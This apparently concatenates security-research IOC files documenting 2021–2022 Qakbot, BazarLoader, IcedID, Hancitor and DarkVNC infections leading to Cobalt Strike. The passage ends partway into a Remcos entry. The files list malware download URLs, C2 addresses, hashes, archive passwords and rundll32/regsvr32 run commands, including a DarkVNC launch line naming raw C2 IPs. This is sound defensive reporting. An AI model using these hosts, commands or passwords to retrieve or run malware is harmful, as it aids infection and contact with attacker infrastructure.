-------------------------------------------------------------------------------- /2021-09-08-IOCs-for-Hancitor-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2021-09-08 (WEDNESDAY) - HANCITOR (CHANITOR/MAN1/MOSKALVZAPOE/TA511) WITH COBALT STRIKE (BEACON) 2 | 3 | EXAMPLE OF EMAIL HEADERS: 4 | 5 | - Received: from STICKNSTUCK.COM ([186.86.69[.]50]) 6 | - Date: Wed, 08 Sep 2021 10:42:29 -0500 7 | - From: "DocuSign Electronic Signature and Invoice Service" 8 | - Subject: You got notification from DocuSign Electronic Service 9 | 10 | - NOTE: STICKNSTUCK.COM is a parked domain being spoofed in emails from today's wave of Hancitor. 11 | 12 | EXAMPLE OF GOOGLE FEEDPROXY LINK USED IN MESSAGE TEXT: 13 | 14 | - hxxp://feedproxy.google[.]com/~r/lxbmpr/~3/sVt0mUVwDTM/derby.php 15 | 16 | ABOVE URL REDIRECTS TO THIS ONE TO SEND WORD DOC FOR HANCITOR: 17 | 18 | - hxxps://www.bpbj[.]id/derby.php?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+lxbmpr+%28terminallyassociated%29 19 | 20 | ASSOCIATED MALWARE 21 | 22 | - SHA256 hash: 42d9fc8acb6df395cd148157f2410185572ef2adf04b4fe1eb2242c924d517ae 23 | - File size: 534,016 bytes 24 | - File name: 0908_3674663753075.doc 25 | - Word doc for Hancitor returned after clicking link from DocuSign-themed malspam 26 | - Sample available at: https://bazaar.abuse.ch/sample/42d9fc8acb6df395cd148157f2410185572ef2adf04b4fe1eb2242c924d517ae/ 27 | 28 | - SHA256 hash: 28978a1c90c581fe12175afeb57e0c408b607997bcd60c188058a7aa7a1514cb 29 | - File size: 340,480 bytes 30 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Templates\reform.doc 31 | - File description: Password-protected Word doc dropped after enabling macros, password: 2281337 32 | - Sample available at: https://bazaar.abuse.ch/sample/28978a1c90c581fe12175afeb57e0c408b607997bcd60c188058a7aa7a1514cb/ 33 | 34 | - SHA256 hash: 891cb03e77807de0ee50fb600358468a98af30eaf744e390ab45684ba06bfb91 35 | - File size: 605,696 bytes 36 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Templates\hhh.mp3 37 | - File description: Hancitor malware DLL 38 | - Run method: rundll32.exe [filename],PKADTGUDFDW 39 | - Sample available at: https://bazaar.abuse.ch/sample/891cb03e77807de0ee50fb600358468a98af30eaf744e390ab45684ba06bfb91/ 40 | 41 | HANCITOR BUILD: 42 | 43 | - 0709_baxc7 44 | 45 | HANCITOR TRAFFIC: 46 | 47 | - port 80 - api.ipify.org - GET / 48 | - 93.125.114[.]53 port 80 - takitrisexp[.]ru - POST /8/forum.php 49 | - 185.49.68[.]111 port 80 - olocratim[.]ru - POST /8/forum.php 50 | - 62.109.19[.]44 port 80 - kedaeclas[.]ru - POST /8/forum.php 51 | 52 | TRAFFIC FOR FOLLOW-UP MALWARE (COBALT STRIKE): 53 | 54 | - 47.88.0[.]40 port 80 - klistr0n[.]ru - GET /0709.bin 55 | - 47.88.0[.]40 port 80 - klistr0n[.]ru - GET /0709s.bin 56 | 57 | COBALT STRIKE TRAFFIC: 58 | 59 | - 23.160.193[.]55 port 80 - 23.160.193[.]55 - GET /l7vC 60 | - 23.160.193[.]55 port 443 - HTTPS traffic 61 | - 23.160.193[.]55 port 80 - 23.160.193[.]55 GET /ca 62 | - 23.160.193[.]55 port 80 - 23.160.193[.]55 - POST /submit.php?id= -------------------------------------------------------------------------------- /2021-10-07-Qakbot-obama111-and-Cobalt-Strike-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-10-07-Qakbot-obama111-and-Cobalt-Strike-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-10-18-IOCs-for-TR-based-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2021-10-18 (MONDAY) - TR-DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE 2 | 3 | NOTE: 4 | 5 | - This Qakbot infection is attributed to the TR distribution network, as metadata in the malware is has a "TR" tag that names the infrastructure used to distribute the malware. 6 | 7 | INFECTION CHAIN: 8 | 9 | - email --> link --> downloaded zip archive --> extracted Excel file --> enable macros --> installer DLL for Qakbot --> Qakbot C2 --> Cobalt Strike activity 10 | 11 | URLS FOR THE INITIAL ZIP ARCHIVE: 12 | 13 | - hxxp://ing-play[.]com/vitaelibero/inventoreest-31247564 14 | - hxxp://ing-play[.]com/vitaelibero/charts-3657249237.zip 15 | 16 | URLS FOR THE INITIAL QAKBOT DLL FILES: 17 | 18 | - hxxp://thanhanhotel[.]com/M7NvbognImhW/hnhkji.html 19 | - hxxps://guardsociety[.]org/4TMUUI9u/hnhkji.html 20 | - hxxp://bro.jerashfestival[.]jo/2kAlAJGc/hnhkji.html 21 | 22 | QAKBOT C2: 23 | 24 | - 103.143.8[.]71 port 443 - HTTPS traffic 25 | - 37.252.0[.]102 port 443 - HTTPS traffic 26 | - 23.111.114[.]52 port 65400 - TCP traffic 27 | 28 | COBALT STRIKE C2: 29 | 30 | - 213.227.154[.]159 port 443 - artysecuritybusinaudit[.]com - HTTPS traffic 31 | 32 | ASSOCIATED MALWARE: 33 | 34 | - SHA256 hash: 086e81e972597d576da5e7f43f12d5814c78acc5881e6bdc58e5659ee42c264f 35 | - File size: 198,572 bytes 36 | - File location: hxxp://ing-play[.]com/vitaelibero/charts-3657249237.zip 37 | - File name: inventoreest-31247564.zip 38 | - File description: Zip archive containing Excel file with macros for Qakbot 39 | 40 | - SHA256 hash: 555d97f2052c8ab8e81698c87f3558506f81d20eeee0138cd2d2e5051a6268aa 41 | - File size: 253,440 bytes 42 | - File name: trend-1367022806.xls 43 | - File description: Extracted from the above archive, Excel file with macros for Qakbot 44 | 45 | - SHA256 hash: 511acd21f0b7ad5bf8297ad113bc5feb0a252940009e7f0588fe001a00520702 46 | - File size: 807,518 bytes 47 | - File location: hxxp://thanhanhotel[.]com/M7NvbognImhW/hnhkji.html 48 | - File location: C:\Datop\test.test 49 | - File description: Corrupt DLL file not fully downloaded, so not actually malicious 50 | 51 | - SHA256 hash: d6b1d2ca4ea331f84bfeab5b0590c418a5f337e84a06344789530afeca1392c8 52 | - File size: 1,583,011 bytes 53 | - File location: hxxps://guardsociety[.]org/4TMUUI9u/hnhkji.html 54 | - File location: C:\Datop\test1.test 55 | - File description: Qakbot installer DLL file 56 | - Run method: regsvr32.exe -s [filename] 57 | 58 | - SHA256 hash: b6c7c10b2389872e1c16b8c398bb3192103ec858179ecb04c89ea93633173796 59 | - File size: 1,583,047 bytes 60 | - File location: hxxp://bro.jerashfestival[.]jo/2kAlAJGc/hnhkji.html 61 | - File location: C:\Datop\test2.test 62 | - File description: Qakbot installer DLL file 63 | - Run method: regsvr32.exe -s [filename] -------------------------------------------------------------------------------- /2021-11-03-TA551-BazarLoader-info.txt: -------------------------------------------------------------------------------- 1 | 2021-11-03 (WEDNESDAY) - TA551 (SHATHAK) BAZARLOADER INFECTION 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - malspam --> password-protected zip attachment --> extracted Word doc --> enable macros --> BazarLoader DLL --> post-infection activity --> Cobalt Strike as follow-up malware 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: 981cdead74b028ee7fb081f369abfde84e1e2ab1cd54ddd3b602ec937651904d 10 | - File size: 35,333 bytes 11 | - File name: instrument indenture,11.03.2021.doc 12 | - File description: TA551 Word document with macros for BazarLoader malware 13 | 14 | - SHA256 hash: 212a0b6d8e9951707e35d84ca4d6c42523fb99102548c34b8d6b83ecb6083534 15 | - File size: 3,366 bytes 16 | - File location: C:\Users\Public\girlYou.hta 17 | - File description: HTA file dropped by Word macros 18 | 19 | - SHA256 hash: 0ee9d13ecc93f06d1f7a1a6ae5f352c67c3e2a3c6314d53e3ad400f1b29054a1 20 | - File size: 442,495 bytes 21 | - File location: C:\Users\Public\nextNextLike.jpg 22 | - File description: Retrieved by .hta file, this is a DLL for BazarLoader 23 | - Run method: regsvr32.exe [filename] 24 | 25 | - SHA256 hash: 72ffe612b16ea8c81c1e1507b309c9452c894b4bdfc65971b7100085f41a45e9 26 | - File size: 153,649 bytes 27 | - File location: B899.dll 28 | - File description: DLL for Cobalt Strike seen after the initial infection 29 | - Run method: rundll32.exe [filename], hkyuFwDacGhvLOsGYdGaRF 30 | 31 | HTTP URL HOSTING INSTALLER DLL: 32 | 33 | - 45.95.11.201 port 80 - pulpfarmerd[.]com - GET /cbfsd/BlDFRsj1bsGvKdLIj/98697/7309/33451/Pg9zYLcfzirZtPtx1Pn64fLoWAIDvNPx4lclw/LaQAZSeiLYPCjjCble334/QdHhD0r/98/RDvuSh/zidem3?q=RYaTpLn2leLH6rxKG0pux1CME3RY&sid=UY8SVDRzRqZb&CWpJmycHi=iF0I26&sid=YGrkJjD4n&q=mbdtF5ziKWJczkstBlW0PBT7Ia&time=DEYO7nTt&q=EY7sl24iZtw7zTehznnCVwHt&q=G9FdCrnm6Z6yu HTTP/1.1 34 | 35 | BAZAR C2: 36 | 37 | - 87.120.37[.]231 port 443 - HTTPS traffic 38 | - 31.13.195[.]145 port 443 - HTTPS traffic 39 | 40 | COBALT STRIKE POST-INFECTION TRAFFIC: 41 | 42 | - 192.34.109[.]19 port 1443 - introwebsites[.]com - HTTPS traffic 43 | -------------------------------------------------------------------------------- /2021-11-04-IOCs-for-TR-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2021-11-04 (THURSDAY) - TR DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - malspam --> link --> zip archive --> Excel file --> enable macros --> three DLLs for Qakbot --> Qakbot post-infection traffic --> Cobalt Strike traffic 6 | 7 | INITIAL ZIP/EXTRACTED EXCEL SPREADSHEET: 8 | 9 | - SHA256 hash: ce1b3d798bfdcd7503d29ff5841039ef7cb3fec51d7dd56cd3344b39a15fd4be 10 | - File size: 57,482 bytes 11 | - File name: autquia-4403601.zip 12 | - File location: hxxp://thepresentcupboard[.]com[.]au/aoptio/charts-297148749.zip 13 | 14 | - SHA256 hash: bd445bae74162f8e6b8d8e855b91d292df13fe28f41d08867edb2a8668d8c734 15 | - File size: 112,128 bytes 16 | - File name: index-2009541103.xls 17 | 18 | INITIAL QAKBOT DLL FILES: 19 | 20 | - SHA256 hash: 43074ef8cd5c2c859b6d21fae25431101872d7f9e79acc9f16f04e7cd64be9b8 21 | - File size: 995,253 bytes 22 | - File location: hxxps://decinfo[.]com[.]br/s4hfZyv7NFEM/y9.html 23 | - File location: C:\Datop\good.good 24 | - Run method: regsvr32 [filename] 25 | - Distribution tag: TR 26 | 27 | - SHA256 hash: 080d33d769ff2c3d103174031d146d606bb0cb57a8fffaa18b4818b512e15c46 28 | - File size: 649,249 bytes 29 | - File location: hxxps://imprimija[.]com[.]br/BIt2Zlm3/y5.html 30 | - File location: C:\Datop\good1.good 31 | - Run method: regsvr32 [filename] 32 | - Distribution tag: TR 33 | 34 | - SHA256 hash: 0c8d1ba996e389aaf08269b7b9adf4360b86f4a70e8af1c2cbf32c34c7b3e887 35 | - File size: 995,298 bytes 36 | - File location: hxxps://stunningmax[.]com/JR3xNs7W7Wm1/y1.html 37 | - File location: C:\Datop\good2.good 38 | - Run method: regsvr32 [filename] 39 | - Distribution tag: TR 40 | 41 | PERSISTENT QAKBOT DLL FILE: 42 | 43 | - SHA256 hash: 4ae2caea3ebe8e5891ad21cf1a8efab399cfcbe2cec21248fb4914f0329b9416 44 | - File size: 1,071,616 bytes 45 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Ejuio\cmmgurwtmo.dll 46 | - Run method: regsvr32.exe -s [filename] 47 | - Distribution tag: notset 48 | 49 | INITIAL URLS FOR ZIP DOWNLOAD: 50 | 51 | - 103.20.200[.]193 port 80 - hxxp://thepresentcupboard[.]com[.]au/aoptio/autquia-4403601 52 | - 103.20.200[.]193 port 80 - hxxp://thepresentcupboard[.]com[.]au/aoptio/charts-297148749.zip 53 | 54 | URLS GENERATED BY EXCEL MACRO FOR QAKBOT DLL FILES: 55 | 56 | - 108.179.193[.]34 port 443 - hxxps://decinfo[.]com[.]br/s4hfZyv7NFEM/y9.html 57 | - 108.179.192[.]18 port 443 - hxxps://imprimija[.]com[.]br/BIt2Zlm3/y5.html 58 | - 23.111.163[.]242 port 443 - hxxps://stunningmax[.]com/JR3xNs7W7Wm1/y1.html 59 | 60 | QAKBOT POST-INFECTION TRAFFIC: 61 | 62 | - 70.93.80[.]154 port 443 - attempted tcp connections 63 | - 75.66.88[.]33 port 443 - HTTPS traffic 64 | 65 | COBALT STRIKE TRAFFIC: 66 | 67 | - 45.141.87[.]3 port 443 - HTTPS traffic 68 | - 45.141.87[.]3 port 443 - decidedsecuritybusiness[.]com - HTTPS traffic 69 | - 23.83.133[.]202 port 443 - xarovaw[.[com - HTTPS traffic 70 | - 212.114.52[.]207 port 443 - dixeku[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2021-11-05-TA551-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-11-05 (FRIDAY) - TA551 (SHATHAK) WORD DOC --> BAZARLOADER --> COBALT STRIKE AND DARK VNC 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - malspam --> password-protected zip attachment --> Word doc --> enable macros --> Bazarloader DLL --> Bazar C2 traffic --> Cobalt Strike & DarkVNC 6 | 7 | NOTES: 8 | 9 | - DarkVNC is a remote access trojan that was seen as early as 2017, but very little has been published about it publicly. References include: 10 | 11 | -- https://reaqta.com/2017/11/short-journey-darkvnc/ 12 | -- https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html 13 | 14 | Recent examples of similar malware identified as DarkVNC can be found at https://bazaar.abuse.ch/browse/tag/darkvnc/ 15 | 16 | ASSOCIATED MALWARE: 17 | 18 | - SHA256 hash: 4d1ba7c3d9cf95d861266734c00defbb10d3aae10aae1380029976a340a9e270 19 | - File size: 35,131 bytes 20 | - File name: require-11.21.doc 21 | - File description: TA551 Word doc retrieved from password-protected zip archive 22 | 23 | - SHA256 hash: 9bb19afbb65c8abb2e2ccdbcf455b21a9a531ab56ef955ff81f2d1d12a40da76 24 | - File size: 3,523 bytes 25 | - File location: C:\Users\Public\doorKarolNext.hta 26 | - File description: HTA file dropped after enabling macros on the above Word doc 27 | 28 | - SHA256 hash: 9368f92222c18019b0b25251c6cdd1d6bd05b46b2f02721ce5a32ffce5e08959 29 | - File size: 283,267 bytes 30 | - File location: C:\Users\Public\girlDowTube.jpg 31 | - File description: DLL for BazarLoader retrieved by above HTA file 32 | - Run method: regsvr32.exe [filename] 33 | 34 | - SHA256 hash: cee3128442b86e3dbc117fe491739c3a21dcd8bd813b2eec8321c59af7537081 35 | - File size: 161,263 bytes 36 | - File location: C:\Users\[username]\AppData\Local\Temp\C9C0.dll 37 | - File description: DLL for Cobalt Strike 38 | - Run method: rundll32.exe [filename], gfhcgfgDzsRALOPB 39 | 40 | - SHA256 hash: e09fa5be06248ef49fae8fc387b604c95b1bb93b871b2527d344b159f5cccfb6 41 | - File size: 404,992 bytes 42 | - File location: C:\Users\[username]\AppData\Local\Temp\FBE4.dll 43 | - File description: DLL for DarkVNC 44 | - Run method: rundll32.exe [filename],DllRegisterServer --id [32 character hex string] --group 19 --ip 87.120.8.190,158.69.133.70,185.106.120.99,45.14.226.195,103.124.106.154,149.3.170.201,5.181.80.103,89.41.182.242,172.83.155.186,45.42.201.179,194.15.112.223 45 | 46 | TA551 TRAFFIC TO RETRIEVE BAZARLOADER DLL: 47 | 48 | - 77.75.230[.]91 port 80 - covermillsd[.]com - GET /boolk/aIqT8eHh2Hd0kfbT0sjjwqP6/sAsvpDjipATdFg9SV2ylmJ5dJHdBeMU6BjCM/16138/gEwAwD8purFO/93628/36005/44935/leh6?search=QPCpFqx3ez051kem0kWeDEmwTR&search=6FfDVvSz&=0gBUpsPtKCh&RatBKf=ypH&pgJm=9XEl56FXiYmitVdrRN&id=XK5BeS&=1DhZbMsFNPDPRkyPOpqvEEXdO9oMi&q=zMhnzBGBO4R4dKv7h 49 | 50 | BAZAR C2 TRAFFIC: 51 | 52 | - 87.120.8[.]112 port 443 - HTTPS traffic 53 | - 87.120.254[.]96 port 443 - HTTPS traffic 54 | 55 | COBALT STRIKE TRAFFIC: 56 | 57 | - 192.34.109[.]102 port 757 - sonyblueprint[.]com - HTTPS traffic 58 | - 23.108.57[.]50 port 443 - guvafe[.]com - HTTPS traffic 59 | 60 | DARKVNC TRAFFIC: 61 | 62 | - 87.120.8[.]190 port 9090 63 | 64 | OTHER IP ADDRESSES USED FOR DARKVNC TRAFFIC (ALL USING TCP PORT 9090): 65 | 66 | - 158.69.133[.]70 67 | - 185.106.120[.]99 68 | - 45.14.226[.]195 69 | - 103.124.106[.]154 70 | - 149.3.170[.]201 71 | - 5.181.80[.]103 72 | - 89.41.182[.]242 73 | - 172.83.155[.]186 74 | - 45.42.201[.]179 75 | - 194.15.112[.]223 -------------------------------------------------------------------------------- /2021-11-15-IOCs-for-Matanbuchus-Qakbot-CobaltStrike-and-spambot-activity.txt: -------------------------------------------------------------------------------- 1 | 2021-11-15 (MONDAY) - MATANBUCHUS DELIVERS QAKBOT (DISTRIBUTION TAG: OBAMA128B), LEADS TO SPAMBOT AND COBALT STRIKE ACTIVITY 2 | 3 | NOTE: 4 | 5 | - For background on Matanbuchus, see: https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/ 6 | 7 | CHAIN OF EVENTS: 8 | 9 | - email --> zip attachment --> extracted Excel file --> enable macros --> Matanbuchus DLL --> Matanbuchus C2 --> Qakbot DLL --> Qakbot C2 --> spambot activity and Cobalt Strike 10 | 11 | ASSOCIATED MALWARE 12 | 13 | - SHA256 hash: 18bd1ae701ff57a6d1119f18c53350688f41cbac0ea1ad0cb73234f6ab733404 14 | - File size: 240.445 bytes 15 | - File name: CLMCP 9215 Nov 15 (383).xlsb 16 | - File description: Excel file with macro for Matanbuchus DLL 17 | 18 | - SHA256 hash: aca6a42ef77fb9e13c8a77caad356b10b7f8114fa89de06acda9ab4e379a69f9 19 | - File size: 883,920 bytes 20 | - File location: hxxp://190.14.37[.]84/5555555.dat 21 | - File location: C:\ProgramData\delta.ocx 22 | - File description: Matanbuchus DLL retreived by Excel macro 23 | - Run method: regsvr32.exe [filename] 24 | 25 | - SHA256 hash: b9b399dbb5d901c16d97b7c30cc182736cd83a7c53313194a1798d61f9c7501e 26 | - File size: 336,896 bytes 27 | - File location: hxxps://softwareupdatechecking[.]at/d8b8d14f-6842-46ec-b254-e92ffe990498/4ad4e44f 28 | - File description: Another DLL retrieved by Matanbuchus DLL 29 | - Run method: unknown 30 | - NOTE: Couldn't find this saved to disk, but C:\ProgramData\F1B2503007FE48B68E2406AD42928F5A\ was created approximately the same time as the related traffic 31 | 32 | - SHA256 hash: 3cde8a896848e9c28ccfcc2db7812602143de7be90aa44fcfe83c85ac7e53f9b 33 | - File size: 565,248 bytes 34 | - File location: hxxp://80.71.158[.]152/disjdifijdjifsdd.dat?iddqd=1 35 | - File location: C:\ProgramData\F1B2503007FE48B68E2406AD42928F5A\yKQeKcEeweN.ocx 36 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Ljsxknicz\enkiysrb.dll 37 | - File description: Retreived by Matanbuchus, Qakbot (Qbot) DLL, distribution tag: obama128b 38 | - Run method: regsvr32.exe -s [filename] 39 | 40 | TRAFFIC TO RETRIEVE MATANBUCHUS DLL: 41 | 42 | - 190.14.37[.]84 port 80 - 190.14.37[.]84 - GET /5555555.dat 43 | 44 | TRAFFIC CAUSED BY MATANBUCHUS: 45 | 46 | - 193.56.146[.]60 port 443 - hxxps://checkingupdatesoftware[.]at/d8b8d14f-6842-46ec-b254-e92ffe990498/b32f9ccc 47 | - 193.56.146[.]61 port 443 - hxxps://softwareupdatechecking[.]at/d8b8d14f-6842-46ec-b254-e92ffe990498/4ad4e44f 48 | - 193.56.146[.]60 port 44413 - 193.56.146[.]60 - POST /GtHODfM/qilZw/YjtK.php 49 | - 193.56.146[.]61 port 44413 - 193.56.146[.]61 - POST /GtHODfM/qilZw/YjtK.php 50 | 51 | TRAFFIC CAUSED BY MATANBUCHUS TO RETRIEVE QAKBOT: 52 | 53 | - 80.71.158[.]152 port 80 - 80.71.158[.]152 - GET /disjdifijdjifsdd.dat?iddqd=1 54 | 55 | QAKBOT TRAFFIC: 56 | 57 | - 71.13.93[.]154 port 6881 - attempted TCP connections 58 | - 103.143.8[.]71 port 443 - attempted TCP connections 59 | - 50.194.160[.]233 port 443 - HTTPS traffic 60 | - 37.252.0[.]102 port 443 - HTTPS traffic 61 | - port 443 - www.openssl[.]org - HTTPS traffic (connectivity check, not inherently malicious) 62 | - 23.111.114[.]52 port 65400 - TCP traffic 63 | - various IP addresses, various ports - Email banner checks 64 | - port 443 - api.ipify[.]org - HTTPS traffic (IP address check, not inherently malicious) 65 | - various IP addresses, various ports (mostly TCP port 25) - spambot traffic (encrypted SMTP) 66 | 67 | COBALT STRIKE TRAFFIC: 68 | 69 | - 5.255.98[.]144 port 8888 - dxabt[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2021-11-22-IOCs-for-Contact-Forms-campaign-activity.txt: -------------------------------------------------------------------------------- 1 | 2021-11-22 (MONDAY) - CONTACT FORMS CAMPAIGN PUSHES BAZARLOADER, LEADS TO COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - We previously called this the "Stolen Images Evidence" campaign, but it has also used other themes. 6 | - This campaign uses contact pages on websites to generate emails 7 | - This campaign uses themes like DMCA violation (stolen images) or that the site is being used for a DDoS attack. 8 | - These form-based emails contain links to Google-hosted pages that deliver malicious zip archives. 9 | 10 | CHAIN OF EVENTS: 11 | 12 | - Email --> Link --> Stolen Images Evidence.zip --> Stolen Images Evidence.js --> BazarLoader DLL --> Bazar C2 traffic --> Cobalt Strike 13 | 14 | EXAMPLES OF MALICIOUS GOOGLEAPIS LINKS FROM THE EMAILS: 15 | 16 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/04jnm49fhb4mfk.html?f=98010055057206238 17 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/0j45nvm4ohhkf.html?h=616579298817753918 18 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/0j45nvm4ohhkf.html?h=814903596081662856 19 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/0j45nvm4ohhkf.html?l=247161489063871373 20 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/49gfhn49bfy34h.html?f=862528881239887564 21 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/49gfhn49bfy34h.html?l=865897479086522531 22 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/6k4mnbvkk49j.html?d=186853687282029549 23 | - hxxps://storage.googleapis[.]com/d20vn4j9chb39v2kf30.appspot.com/public/0/files/d/9n5nw8yg4k4.html?h=385340095387424816 24 | 25 | ASSOCIATED MALWARE: 26 | 27 | - SHA256 hash: 8a2b83c479ac871edf5471d3a0ad91aaac8115ee2dd7ccb1f4a23e09da1ff2a4 28 | - File size: 2,734 bytes 29 | - File name: Stolen_Images_Evidence.zip 30 | - File description: ZIP archive downloaded from googleapis page 31 | 32 | - SHA256 hash: 7636d563c16a37aa05fdbe2b29e65c934f3f25d08b48d5ce91f3023e6f2e5729 33 | - File size: 6,248 bytes 34 | - File name: Stolen_Images_Evidence.js 35 | - File description: JS file extracted from the above ZIP archive 36 | 37 | - SHA256 hash: 30d991153e4d40909ff95b5252ce6f82b7e4ab064214da4ff28f02bd45ffd6fa 38 | - File size: 308,244 bytes 39 | - File location: hxxp://mosteplo[.]top/222g100/main.php 40 | - File location: C:\Users\[username]\AppData\Local\Temp\mnevPL.bin 41 | - File description: BazarLoader DLL retreived by the above JS file 42 | 43 | TRAFFIC TO RETRIEVE THE ARCHIVE: 44 | 45 | - 104.21.19[.]55 port 443 - barconia[.]top - HTTPS traffic retrieved by googleapis page 46 | 47 | TRAFFIC TO RETRIEVE BAZARLOADER DLL: 48 | 49 | - 104.21.8[.]143 port 80 - mosteplo[.]top - GET /222g100/index.php 50 | - 104.21.8[.]143 port 80 - mosteplo[.]top - GET /222g100/main.php 51 | 52 | BAZAR C2 TRAFFIC: 53 | 54 | - 162.33.179[.]96 port 443 - HTTPS/SSL/TLS traffic 55 | - 162.33.178[.]153 port 443 - HTTPS/SSL/TLS traffic 56 | 57 | COBALT STRIKE TRAFFIC: 58 | 59 | - 185.81.114[.]125 port 443 - zuppohealth[.]com -------------------------------------------------------------------------------- /2021-12-10-IOCs-for-TA551-IcedID-infection-with-Cobalt-Strike-and-DarkVNC.txt: -------------------------------------------------------------------------------- 1 | 2021-12-10 (FRIDAY) - TA551 (SHATHAK) ICEDID (BOKBOT) WITH COBALT STRIKE & DARK VNC 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> password-protected zip archive --> Word doc --> enable macros --> installer DLL --> gzip binary --> persistent IcedID --> C2 activity --> Cobalt Strike & DarkVNC as follow-up malware 6 | 7 | NOTES: 8 | 9 | - Cobalt Strike and DarkVNC traffic occurred during this infection, but no binaries for these two malware families were saved to disk. 10 | 11 | ASSOCIATED MALWARE: 12 | 13 | - SHA256 hash: 6a6a5c2082110a74eb93c7ae402366258db1a8b2fbd055f6f818c1beac1a0347 14 | - File size: 51,463 bytes 15 | - File name: Info.zip 16 | - File description: password-protected zip archive attached to email 17 | - Password: ujy55 18 | 19 | - SHA256 hash: 6403581b415e32cfb92c28f1628126f05a15e4583f33f5856f0dc731640ee955 20 | - File size: 43,512 bytes 21 | - File name: rule.12.21.doc 22 | - File description: TA551 Word doc with macros for IcedID installer 23 | 24 | - SHA256 hash: 27bda9f843a233947ed63de0107f8f23f2e5ce08bbf40cca29cedab2c285a1ed 25 | - File size: 3,535 bytes 26 | - File name: C:\Users\[username]\Documents\likePowLike.hta 27 | - File description: HTA file dropped by above Word document (HTA always in the Documents directory) 28 | 29 | - SHA256 hash: 91f6e11096604479f796787e8f4315cee982d7abb7d7e817f7377dd01e1b8b47 30 | - File size: 227,455 bytes 31 | - File location: hXXp://copelandbenefitg[.]com/frhe/1ukcmJN/yCvH52W8TJwx5X6Sfo0Cui6JnmHG2PFr2omut/MXdINzqAuUBxk4ZqjDiASIJQ0T2z9/BjpzhVrLsYXGsW2y8Lh5/repa7?user=oq7xaGpp0HeOeVHY&page=DJpnZd6hKsTc&page=IW96WhLYqVxOj4iAasoL5iF&time=sH0HCUHcuo&id=70Uezj2iHkaqZbtvoqIQoc6iX3ld&cid=q9XLicGSEHSJQ5DxImz1&=nlTMmjAL9k2huJIqBoyNbC4&q=c5bIpGxMHT&user=NwBOY6y5xcvi5wMU 32 | - File location: C:\Users\Public\loadLikeLoad.jpg 33 | - File description: Installer DLL for IcedID 34 | - Run method: regsvr32.exe [filename] 35 | 36 | - SHA256 hash: 2b948191f534f43a21842b4657eb2b58c9e3d9dc9ab4facf4b1f029c702800c8 37 | - File size: 462,973 bytes 38 | - File location: hXXp://jeliskvosh[.]com/ 39 | - File description: Binary retreived by IcedID installer 40 | - File type: gzip compressed data, was "Income.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1075616 41 | 42 | - SHA256 hash: cfc202b44509f2f607d365858a8218dfdc6b26f8087efcc5e46f4fef9ab53705 43 | - File size: 341,898 bytes 44 | - File name: C:\Users\[username]\AppData\Roaming\WrongEvolve\license.dat 45 | - File description: license.dat binary needed to run persistent IcedID DLL 46 | 47 | - SHA256 hash: 2d5584e4c30e2a82e8da600bf6686ba261d838f27fc82d1c8feff8c1bb4ee5e3 48 | - File size: 120,320 bytes 49 | - File name: C:\Users\[username]\AppData\Local\iyraed2\{6CC49CA5-BD87-48D5-05CE-51176ABC04C6}\owkaidmi.dll 50 | - File description: Persistent IcedID DLL (persistent through scheduled task) 51 | - Run method: rundll32.exe [filename],DllMain --fi="[path to license.dat]" 52 | 53 | TRAFFIC FOR INSTALLER DLL: 54 | 55 | - 146.19.233[.]44 port 80 - copelandbenefitg[.]com - GET /frhe/[long string]/repa7?[long string] 56 | 57 | TRAFFIC CAUSED BY ICEDID INSTALLER DLL: 58 | 59 | - port 443 - aws.amazon[.]com - HTTPS traffic 60 | - 94.140.112[.]17 port 80 - jeliskvosh[.]com - GET / 61 | 62 | ICEDID C2 TRAFFIC: 63 | 64 | - 87.120.8[.]98 port 443 - baeswea[.]com - IcedID C2 HTTPS traffic 65 | 66 | COBALT STRIKE TRAFFIC: 67 | 68 | - 108.62.118[.]215 port 443 - solobiv[.]com - Cobalt Strike HTTPS traffic 69 | 70 | DARK VNC TRAFFIC: 71 | 72 | - 88.119.161[.]76 port 8080 - encoded/encrypted TCP traffic for DarkVNC 73 | -------------------------------------------------------------------------------- /2022-01-04-IOCs-from-Remcos-RAT-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-01-04 (TUESDAY) - WELLS FARGO-THEMED MALSPAM LEADS TO REMCOS RAT 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - email --> attached Excel file --> enable macros --> OneDrive URL --> VBS file --> obfuscated script from two HTTP URLs ending in .jpg --> Remcos RAT C2 traffic 6 | 7 | EMAIL INFO: 8 | 9 | - Date: Tue, 4 Jan 2022 19:14 UTC 